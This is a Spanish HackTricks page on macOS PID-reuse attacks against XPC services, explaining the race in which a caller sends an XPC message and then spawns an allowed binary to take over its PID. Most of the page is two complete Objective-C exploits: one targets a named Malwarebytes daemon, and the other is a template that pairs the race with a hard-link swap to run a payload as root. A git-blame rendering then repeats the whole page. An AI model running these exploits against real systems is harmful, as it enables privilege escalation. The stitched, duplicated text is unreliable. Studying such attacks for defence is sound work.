hacktricks/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md

# Reutilización de PID en macOS

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de Telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## Reutilización de PID

Cuando un servicio **XPC de macOS** verifica el proceso llamado basándose en el **PID** y no en el **token de auditoría**, es vulnerable a un ataque de reutilización de PID. Este ataque se basa en una **condición de carrera** donde un **exploit** va a **enviar mensajes al servicio XPC** abusando de la funcionalidad y justo **después** ejecutar **`posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ)`** con el binario **permitido**.

Esta función hará que el binario **permitido sea dueño del PID**, pero el **mensaje XPC malicioso ya habrá sido enviado** justo antes. Por lo tanto, si el servicio **XPC** utiliza el **PID** para **autenticar** al remitente y lo verifica **DESPUÉS** de la ejecución de **`posix_spawn`**, pensará que proviene de un proceso **autorizado**.

### Ejemplo de exploit

Si encuentras la función **`shouldAcceptNewConnection`** o una función llamada por ella que **llame a** **`processIdentifier`** y no llame a **`auditToken`**, es muy probable que esté verificando el PID del proceso y no el token de auditoría.\
Como por ejemplo en esta imagen (tomada de la referencia):

<figure><img src="../../../../.gitbook/assets/image (4) (1) (1) (1) (2).png" alt=""><figcaption></figcaption></figure>

Comprueba este ejemplo de exploit (de nuevo, tomado de la referencia) para ver las 2 partes del exploit:

* Una que **genera varios forks**
* **Cada fork** enviará el **payload** al servicio XPC mientras ejecuta **`posix_spawn`** justo después de enviar el mensaje.

{% hint style="danger" %}
Para que el exploit funcione, es importante exportar **`OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES`** o ponerlo en el exploit:
```objectivec
asm(".section __DATA,__objc_fork_ok\n"
"empty:\n"
".no_dead_strip empty\n");
```
{% endhint %}

{% tabs %}
{% tab title="NSTasks" %}
Primera opción utilizando **`NSTasks`** y argumento para lanzar los procesos hijos para explotar el RC
```objectivec
// from https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/
// gcc -framework Foundation expl.m -o expl

#import <Foundation/Foundation.h>
#include <spawn.h>
#include <sys/stat.h>

#define RACE_COUNT 32
#define MACH_SERVICE @"com.malwarebytes.mbam.rtprotection.daemon"
#define BINARY "/Library/Application Support/Malwarebytes/MBAM/Engine.bundle/Contents/PlugIns/RTProtectionDaemon.app/Contents/MacOS/RTProtectionDaemon"

// allow fork() between exec()
asm(".section __DATA,__objc_fork_ok\n"
"empty:\n"
".no_dead_strip empty\n");

extern char **environ;

// defining necessary protocols
@protocol ProtectionService
- (void)startDatabaseUpdate;
- (void)restoreApplicationLauncherWithCompletion:(void (^)(BOOL))arg1;
- (void)uninstallProduct;
- (void)installProductUpdate;
- (void)startProductUpdateWith:(NSUUID *)arg1 forceInstall:(BOOL)arg2;
- (void)buildPurchaseSiteURLWithCompletion:(void (^)(long long, NSString *))arg1;
- (void)triggerLicenseRelatedChecks;
- (void)buildRenewalLinkWith:(NSUUID *)arg1 completion:(void (^)(long long, NSString *))arg2;
- (void)cancelTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;
- (void)startTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;
- (void)unredeemLicenseKeyWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;
- (void)applyLicenseWith:(NSUUID *)arg1 key:(NSString *)arg2 completion:(void (^)(long long))arg3;
- (void)controlProtectionWithRawFeatures:(long long)arg1 rawOperation:(long long)arg2;
- (void)restartOS;
- (void)resumeScanJob;
- (void)pauseScanJob;
- (void)stopScanJob;
- (void)startScanJob;
- (void)disposeOperationBy:(NSUUID *)arg1;
- (void)subscribeTo:(long long)arg1;
- (void)pingWithTag:(NSUUID *)arg1 completion:(void (^)(NSUUID *, long long))arg2;
@end

void child() {

// send the XPC messages
NSXPCInterface *remoteInterface = [NSXPCInterface interfaceWithProtocol:@protocol(ProtectionService)];
NSXPCConnection *xpcConnection = [[NSXPCConnection alloc] initWithMachServiceName:MACH_SERVICE options:NSXPCConnectionPrivileged];
xpcConnection.remoteObjectInterface = remoteInterface;

[xpcConnection resume];
[xpcConnection.remoteObjectProxy restartOS];

char target_binary[] = BINARY;
char *target_argv[] = {target_binary, NULL};
posix_spawnattr_t attr;
posix_spawnattr_init(&attr);
short flags;
posix_spawnattr_getflags(&attr, &flags);
flags |= (POSIX_SPAWN_SETEXEC | POSIX_SPAWN_START_SUSPENDED);
posix_spawnattr_setflags(&attr, flags);
posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ);
}

bool create_nstasks() {

NSString *exec = [[NSBundle mainBundle] executablePath];
NSTask *processes[RACE_COUNT];

for (int i = 0; i < RACE_COUNT; i++) {
processes[i] = [NSTask launchedTaskWithLaunchPath:exec arguments:@[ @"imanstask" ]];
}

int i = 0;
struct timespec ts = {
.tv_sec = 0,
.tv_nsec = 500 * 1000000,
};

nanosleep(&ts, NULL);
if (++i > 4) {
for (int i = 0; i < RACE_COUNT; i++) {
[processes[i] terminate];
}
return false;
}

return true;
}

int main(int argc, const char * argv[]) {

if(argc > 1) {
// called from the NSTasks
child();

} else {
NSLog(@"Starting the race");
create_nstasks();
}

return 0;
}
```
{% tab title="fork" %}
Este ejemplo utiliza un **`fork`** para lanzar **procesos hijos que aprovecharán la condición de carrera del PID** y luego aprovecharán **otra condición de carrera a través de un enlace duro:**
```objectivec
// export OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES
// gcc -framework Foundation expl.m -o expl

#include <Foundation/Foundation.h>
#include <spawn.h>
#include <pthread.h>

// TODO: CHANGE PROTOCOL AND FUNCTIONS
@protocol HelperProtocol
- (void)DoSomething:(void (^)(_Bool))arg1;
@end

// Global flag to track exploitation status
bool pwned = false;

/**
* Continuously overwrite the contents of the 'hard_link' file in a race condition to make the
* XPC service verify the legit binary and then execute as root out payload.
*/
void *check_race(void *arg) {
while(!pwned) {
// Overwrite with contents of the legit binary
system("cat ./legit_bin > hard_link");
usleep(50000);

// Overwrite with contents of the payload to execute
// TODO: COMPILE YOUR OWN PAYLOAD BIN
system("cat ./payload > hard_link");
usleep(50000);
}
return NULL;
}

void child_xpc_pid_rc_abuse(){
// TODO: INDICATE A VALID BIN TO BYPASS SIGN VERIFICATION
#define kValid "./Legit Updater.app/Contents/MacOS/Legit"
extern char **environ;

// Connect with XPC service
// TODO: CHANGE THE ID OF THE XPC TO EXPLOIT
NSString*  service_name = @"com.example.Helper";
NSXPCConnection* connection = [[NSXPCConnection alloc] initWithMachServiceName:service_name options:0x1000];
// TODO: CNAGE THE PROTOCOL NAME
NSXPCInterface* interface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperProtocol)];
[connection setRemoteObjectInterface:interface];
[connection resume];

id obj = [connection remoteObjectProxyWithErrorHandler:^(NSError* error) {
NSLog(@"[-] Something went wrong");
NSLog(@"[-] Error: %@", error);
}];

NSLog(@"obj: %@", obj);
NSLog(@"conn: %@", connection);

// Call vulenrable XPC function
// TODO: CHANEG NAME OF FUNCTION TO CALL
[obj DoSomething:^(_Bool b){
NSLog(@"Response, %hdd", b);
}];

// Change current process to the legit binary suspended
char target_binary[] = kValid;
char *target_argv[] = {target_binary, NULL};
posix_spawnattr_t attr;
posix_spawnattr_init(&attr);
short flags;
posix_spawnattr_getflags(&attr, &flags);
flags |= (POSIX_SPAWN_SETEXEC | POSIX_SPAWN_START_SUSPENDED);
posix_spawnattr_setflags(&attr, flags);
posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ);
}

/**
* Function to perform the PID race condition using children calling the XPC exploit.
*/
void xpc_pid_rc_abuse() {
#define RACE_COUNT 1
extern char **environ;
int pids[RACE_COUNT];

// Fork child processes to exploit
for (int i = 0; i < RACE_COUNT; i++) {
int pid = fork();
if (pid == 0) {  // If a child process
child_xpc_pid_rc_abuse();
}
printf("forked %d\n", pid);
pids[i] = pid;
}

// Wait for children to finish their tasks
sleep(3);

// Terminate child processes
for (int i = 0; i < RACE_COUNT; i++) {
if (pids[i]) {
kill(pids[i], 9);
}
}
}

int main(int argc, const char * argv[]) {
// Create and set execution rights to 'hard_link' file
system("touch hard_link");
system("chmod +x hard_link");

// Create thread to exploit sign verification RC
pthread_t thread;
pthread_create(&thread, NULL, check_race, NULL);

while(!pwned) {
// Try creating 'download' directory, ignore errors
system("mkdir download 2>/dev/null");

// Create a hardlink
// TODO: CHANGE NAME OF FILE FOR SIGN VERIF RC
system("ln hard_link download/legit_bin");

xpc_pid_rc_abuse();
usleep(10000);

// The payload will generate this file if exploitation is successfull
if (access("/tmp/pwned", F_OK ) == 0) {
pwned = true;
}
}

return 0;
}
```
{% endtab %}
{% endtabs %}

## Referencias

* [https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/](https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/)
* [https://saelo.github.io/presentations/warcon18\_dont\_trust\_the\_pid.pdf](https://saelo.github.io/presentations/warcon18\_dont\_trust\_the\_pid.pdf)

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de Telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
f 2023-06-05 18:30:03 +00:00			`# Reutilización de PID en macOS`

			`<details>`

			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`

			`* ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
			`* Descubre [The PEASS Family](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Obtén el [swag oficial de PEASS y HackTricks](https://peass.creator-spring.com)`
Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology 2023-08-16 05:10:21 +00:00			`* Únete al [💬](https://emojipedia.org/speech-balloon/) [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de Telegram](https://t.me/peass) o sígueme en Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Comparte tus trucos de hacking enviando PRs al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
f 2023-06-05 18:30:03 +00:00
			`</details>`

			`## Reutilización de PID`

Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology 2023-08-16 05:10:21 +00:00			Cuando un servicio XPC de macOS verifica el proceso llamado basándose en el PID y no en el token de auditoría, es vulnerable a un ataque de reutilización de PID. Este ataque se basa en una condición de carrera donde un exploit va a enviar mensajes al servicio XPC abusando de la funcionalidad y justo después ejecutar `posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ)` con el binario permitido.
f 2023-06-05 18:30:03 +00:00
Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology 2023-08-16 05:10:21 +00:00			Esta función hará que el binario permitido sea dueño del PID, pero el mensaje XPC malicioso ya habrá sido enviado justo antes. Por lo tanto, si el servicio XPC utiliza el PID para autenticar al remitente y lo verifica DESPUÉS de la ejecución de `posix_spawn`, pensará que proviene de un proceso autorizado.
f 2023-06-05 18:30:03 +00:00
			`### Ejemplo de exploit`

Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology 2023-08-16 05:10:21 +00:00			Si encuentras la función `shouldAcceptNewConnection` o una función llamada por ella que llame a `processIdentifier` y no llame a `auditToken`, es muy probable que esté verificando el PID del proceso y no el token de auditoría.\
f 2023-06-05 18:30:03 +00:00			`Como por ejemplo en esta imagen (tomada de la referencia):`

Translated ['README.md', 'backdoors/salseo.md', 'forensics/basic-forensi 2023-08-31 16:01:08 +00:00			`<figure><img src="../../../../.gitbook/assets/image (4) (1) (1) (1) (2).png" alt=""><figcaption></figcaption></figure>`
f 2023-06-05 18:30:03 +00:00
			`Comprueba este ejemplo de exploit (de nuevo, tomado de la referencia) para ver las 2 partes del exploit:`

			`* Una que genera varios forks`
			* Cada fork enviará el payload al servicio XPC mientras ejecuta `posix_spawn` justo después de enviar el mensaje.

			`{% hint style="danger" %}`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2023-09-25 00:58:35 +00:00			Para que el exploit funcione, es importante exportar `OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES` o ponerlo en el exploit:
f 2023-06-05 18:30:03 +00:00			```objectivec
			`asm(".section __DATA,__objc_fork_ok\n"`
			`"empty:\n"`
			`".no_dead_strip empty\n");`
			```
			`{% endhint %}`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2023-09-25 00:58:35 +00:00
			`{% tabs %}`
			`{% tab title="NSTasks" %}`
			Primera opción utilizando `NSTasks` y argumento para lanzar los procesos hijos para explotar el RC
f 2023-06-05 18:30:03 +00:00			```objectivec
			`// from https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2023-09-25 00:58:35 +00:00			`// gcc -framework Foundation expl.m -o expl`
f 2023-06-05 18:30:03 +00:00
			`#import <Foundation/Foundation.h>`
			`#include <spawn.h>`
			`#include <sys/stat.h>`

			`#define RACE_COUNT 32`
			`#define MACH_SERVICE @"com.malwarebytes.mbam.rtprotection.daemon"`
			`#define BINARY "/Library/Application Support/Malwarebytes/MBAM/Engine.bundle/Contents/PlugIns/RTProtectionDaemon.app/Contents/MacOS/RTProtectionDaemon"`

			`// allow fork() between exec()`
			`asm(".section __DATA,__objc_fork_ok\n"`
			`"empty:\n"`
			`".no_dead_strip empty\n");`

			`extern char **environ;`

			`// defining necessary protocols`
			`@protocol ProtectionService`
			`- (void)startDatabaseUpdate;`
			`- (void)restoreApplicationLauncherWithCompletion:(void (^)(BOOL))arg1;`
			`- (void)uninstallProduct;`
			`- (void)installProductUpdate;`
			`- (void)startProductUpdateWith:(NSUUID *)arg1 forceInstall:(BOOL)arg2;`
			`- (void)buildPurchaseSiteURLWithCompletion:(void (^)(long long, NSString *))arg1;`
			`- (void)triggerLicenseRelatedChecks;`
			`- (void)buildRenewalLinkWith:(NSUUID )arg1 completion:(void (^)(long long, NSString ))arg2;`
			`- (void)cancelTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;`
			`- (void)startTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;`
			`- (void)unredeemLicenseKeyWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;`
			`- (void)applyLicenseWith:(NSUUID )arg1 key:(NSString )arg2 completion:(void (^)(long long))arg3;`
			`- (void)controlProtectionWithRawFeatures:(long long)arg1 rawOperation:(long long)arg2;`
			`- (void)restartOS;`
			`- (void)resumeScanJob;`
			`- (void)pauseScanJob;`
			`- (void)stopScanJob;`
			`- (void)startScanJob;`
			`- (void)disposeOperationBy:(NSUUID *)arg1;`
			`- (void)subscribeTo:(long long)arg1;`
			`- (void)pingWithTag:(NSUUID )arg1 completion:(void (^)(NSUUID , long long))arg2;`
			`@end`

			`void child() {`

Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology 2023-08-16 05:10:21 +00:00			`// send the XPC messages`
			`NSXPCInterface *remoteInterface = [NSXPCInterface interfaceWithProtocol:@protocol(ProtectionService)];`
			`NSXPCConnection *xpcConnection = [[NSXPCConnection alloc] initWithMachServiceName:MACH_SERVICE options:NSXPCConnectionPrivileged];`
			`xpcConnection.remoteObjectInterface = remoteInterface;`

			`[xpcConnection resume];`
			`[xpcConnection.remoteObjectProxy restartOS];`

			`char target_binary[] = BINARY;`
			`char *target_argv[] = {target_binary, NULL};`
			`posix_spawnattr_t attr;`
			`posix_spawnattr_init(&attr);`
			`short flags;`
			`posix_spawnattr_getflags(&attr, &flags);`
			`flags \|= (POSIX_SPAWN_SETEXEC \| POSIX_SPAWN_START_SUSPENDED);`
			`posix_spawnattr_setflags(&attr, flags);`
			`posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ);`
f 2023-06-05 18:30:03 +00:00			`}`

			`bool create_nstasks() {`

Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology 2023-08-16 05:10:21 +00:00			`NSString *exec = [[NSBundle mainBundle] executablePath];`
			`NSTask *processes[RACE_COUNT];`
f 2023-06-05 18:30:03 +00:00
Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology 2023-08-16 05:10:21 +00:00			`for (int i = 0; i < RACE_COUNT; i++) {`
			`processes[i] = [NSTask launchedTaskWithLaunchPath:exec arguments:@[ @"imanstask" ]];`
			`}`
f 2023-06-05 18:30:03 +00:00
Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology 2023-08-16 05:10:21 +00:00			`int i = 0;`
			`struct timespec ts = {`
			`.tv_sec = 0,`
			`.tv_nsec = 500 * 1000000,`
			`};`
f 2023-06-05 18:30:03 +00:00
Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology 2023-08-16 05:10:21 +00:00			`nanosleep(&ts, NULL);`
			`if (++i > 4) {`
			`for (int i = 0; i < RACE_COUNT; i++) {`
			`[processes[i] terminate];`
			`}`
			`return false;`
			`}`
f 2023-06-05 18:30:03 +00:00
Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology 2023-08-16 05:10:21 +00:00			`return true;`
f 2023-06-05 18:30:03 +00:00			`}`

			`int main(int argc, const char * argv[]) {`

Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology 2023-08-16 05:10:21 +00:00			`if(argc > 1) {`
			`// called from the NSTasks`
			`child();`
f 2023-06-05 18:30:03 +00:00
Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology 2023-08-16 05:10:21 +00:00			`} else {`
			`NSLog(@"Starting the race");`
			`create_nstasks();`
			`}`
f 2023-06-05 18:30:03 +00:00
Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology 2023-08-16 05:10:21 +00:00			`return 0;`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2023-09-25 00:58:35 +00:00			`}`
			```
			`{% tab title="fork" %}`
			Este ejemplo utiliza un `fork` para lanzar procesos hijos que aprovecharán la condición de carrera del PID y luego aprovecharán otra condición de carrera a través de un enlace duro:
			```objectivec
			`// export OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES`
			`// gcc -framework Foundation expl.m -o expl`

			`#include <Foundation/Foundation.h>`
			`#include <spawn.h>`
			`#include <pthread.h>`

			`// TODO: CHANGE PROTOCOL AND FUNCTIONS`
			`@protocol HelperProtocol`
			`- (void)DoSomething:(void (^)(_Bool))arg1;`
			`@end`

			`// Global flag to track exploitation status`
			`bool pwned = false;`

			`/**`
			`* Continuously overwrite the contents of the 'hard_link' file in a race condition to make the`
			`* XPC service verify the legit binary and then execute as root out payload.`
			`*/`
			`void check_race(void arg) {`
			`while(!pwned) {`
			`// Overwrite with contents of the legit binary`
			`system("cat ./legit_bin > hard_link");`
			`usleep(50000);`

			`// Overwrite with contents of the payload to execute`
			`// TODO: COMPILE YOUR OWN PAYLOAD BIN`
			`system("cat ./payload > hard_link");`
			`usleep(50000);`
			`}`
			`return NULL;`
			`}`

			`void child_xpc_pid_rc_abuse(){`
			`// TODO: INDICATE A VALID BIN TO BYPASS SIGN VERIFICATION`
			`#define kValid "./Legit Updater.app/Contents/MacOS/Legit"`
			`extern char **environ;`

			`// Connect with XPC service`
			`// TODO: CHANGE THE ID OF THE XPC TO EXPLOIT`
			`NSString* service_name = @"com.example.Helper";`
			`NSXPCConnection* connection = [[NSXPCConnection alloc] initWithMachServiceName:service_name options:0x1000];`
			`// TODO: CNAGE THE PROTOCOL NAME`
			`NSXPCInterface* interface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperProtocol)];`
			`[connection setRemoteObjectInterface:interface];`
			`[connection resume];`

			`id obj = [connection remoteObjectProxyWithErrorHandler:^(NSError* error) {`
			`NSLog(@"[-] Something went wrong");`
			`NSLog(@"[-] Error: %@", error);`
			`}];`

			`NSLog(@"obj: %@", obj);`
			`NSLog(@"conn: %@", connection);`

			`// Call vulenrable XPC function`
			`// TODO: CHANEG NAME OF FUNCTION TO CALL`
			`[obj DoSomething:^(_Bool b){`
			`NSLog(@"Response, %hdd", b);`
			`}];`

			`// Change current process to the legit binary suspended`
			`char target_binary[] = kValid;`
			`char *target_argv[] = {target_binary, NULL};`
			`posix_spawnattr_t attr;`
			`posix_spawnattr_init(&attr);`
			`short flags;`
			`posix_spawnattr_getflags(&attr, &flags);`
			`flags \|= (POSIX_SPAWN_SETEXEC \| POSIX_SPAWN_START_SUSPENDED);`
			`posix_spawnattr_setflags(&attr, flags);`
			`posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ);`
			`}`

			`/**`
			`* Function to perform the PID race condition using children calling the XPC exploit.`
			`*/`
			`void xpc_pid_rc_abuse() {`
			`#define RACE_COUNT 1`
			`extern char **environ;`
			`int pids[RACE_COUNT];`

			`// Fork child processes to exploit`
			`for (int i = 0; i < RACE_COUNT; i++) {`
			`int pid = fork();`
			`if (pid == 0) { // If a child process`
			`child_xpc_pid_rc_abuse();`
			`}`
			`printf("forked %d\n", pid);`
			`pids[i] = pid;`
			`}`

			`// Wait for children to finish their tasks`
			`sleep(3);`

			`// Terminate child processes`
			`for (int i = 0; i < RACE_COUNT; i++) {`
			`if (pids[i]) {`
			`kill(pids[i], 9);`
			`}`
			`}`
			`}`

			`int main(int argc, const char * argv[]) {`
			`// Create and set execution rights to 'hard_link' file`
			`system("touch hard_link");`
			`system("chmod +x hard_link");`

			`// Create thread to exploit sign verification RC`
			`pthread_t thread;`
			`pthread_create(&thread, NULL, check_race, NULL);`

			`while(!pwned) {`
			`// Try creating 'download' directory, ignore errors`
			`system("mkdir download 2>/dev/null");`

			`// Create a hardlink`
			`// TODO: CHANGE NAME OF FILE FOR SIGN VERIF RC`
			`system("ln hard_link download/legit_bin");`

			`xpc_pid_rc_abuse();`
			`usleep(10000);`

			`// The payload will generate this file if exploitation is successfull`
			`if (access("/tmp/pwned", F_OK ) == 0) {`
			`pwned = true;`
			`}`
			`}`

			`return 0;`
			`}`
f 2023-06-05 18:30:03 +00:00			```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2023-09-25 00:58:35 +00:00			`{% endtab %}`
			`{% endtabs %}`

f 2023-06-05 18:30:03 +00:00			`## Referencias`

			`* [https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/](https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/)`
			`* [https://saelo.github.io/presentations/warcon18\_dont\_trust\_the\_pid.pdf](https://saelo.github.io/presentations/warcon18\_dont\_trust\_the\_pid.pdf)`

			`<details>`

			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`

			`* ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
			`* Descubre [The PEASS Family](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Obtén el [swag oficial de PEASS y HackTricks](https://peass.creator-spring.com)`
Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology 2023-08-16 05:10:21 +00:00			`* Únete al [💬](https://emojipedia.org/speech-balloon/) [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de Telegram](https://t.me/peass) o sígueme en Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Comparte tus trucos de hacking enviando PRs al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
f 2023-06-05 18:30:03 +00:00
			`</details>`